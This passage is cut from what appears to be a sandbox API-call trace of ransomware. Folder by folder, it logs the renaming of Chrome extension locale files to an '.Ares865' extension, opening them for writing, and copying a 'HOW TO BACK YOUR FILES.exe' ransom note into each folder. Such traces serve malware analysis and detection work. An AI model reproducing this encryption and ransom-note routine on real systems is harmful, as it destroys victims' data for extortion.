ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eef9320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eef9320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.278] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.278] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.Ares865") returned 160 [0103.278] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.280] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=266) returned 1 [0103.283] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" [0103.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro" [0103.283] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.283] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.284] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.284] GetLastError () returned 0x0 [0103.284] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8666a1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef1f480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef1f480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.284] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.284] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.284] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.Ares865") returned 160 [0103.285] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.300] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0103.303] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" [0103.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT" [0103.303] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.303] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.304] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.304] GetLastError () returned 0x0 [0103.304] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.304] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef1f480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef1f480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.305] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.305] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.305] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865") returned 163 [0103.305] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.307] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=208) returned 1 [0103.309] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" [0103.310] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR" [0103.310] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.310] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.310] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.311] GetLastError () returned 0x0 [0103.311] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.311] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86644070, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef1f480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef1f480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.311] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.311] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865") returned 163 [0103.311] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0103.316] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" [0103.316] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" [0103.316] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.316] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.317] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.317] GetLastError () returned 0x0 [0103.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.317] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef455e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef455e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.317] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.317] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.Ares865") returned 160 [0103.318] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0103.323] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" [0103.323] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" [0103.323] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.323] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.324] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.324] GetLastError () returned 0x0 [0103.324] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef455e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef455e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.324] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.325] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.Ares865") returned 160 [0103.325] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 